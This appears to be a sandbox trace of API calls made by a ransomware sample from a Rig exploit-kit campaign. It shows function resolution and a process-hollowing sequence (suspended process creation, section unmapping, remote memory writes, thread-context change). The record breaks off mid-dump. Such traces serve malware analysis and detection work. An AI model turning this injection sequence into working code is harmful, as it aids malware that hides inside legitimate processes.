[0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.993] VirtualProtect (in: lpAddress=0x213388, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0085.995] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0085.995] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0085.995] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0085.995] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0085.996] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0085.996] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0085.996] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0085.996] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0085.996] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0085.996] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0085.996] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0085.996] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0085.996] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0085.996] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0085.996] RegisterClassExA (param_1=0x12fbc0) returned 0xc13b [0086.002] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x50144 [0086.575] PostMessageA (hWnd=0x50144, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0086.575] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0086.576] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0086.576] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1c0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0086.576] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0086.576] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" ", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xa88, dwThreadId=0xa8c)) returned 1 [0086.579] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.579] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0086.579] GetThreadContext (in: hThread=0x48, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0086.580] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0086.580] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0086.580] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0086.580] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x214628*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x214628*, lpNumberOfBytesWritten=0x0) returned 1 [0086.582] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x214a28, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0086.582] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x214a28*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x214a28*, lpNumberOfBytesWritten=0x0) returned 1 [0086.589] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x269028*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x269028*, lpNumberOfBytesWritten=0x0) returned 1 [0086.590] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x21475c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x21475c*, lpNumberOfBytesWritten=0x0) returned 1 [0086.590] SetThreadContext (hThread=0x48, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, 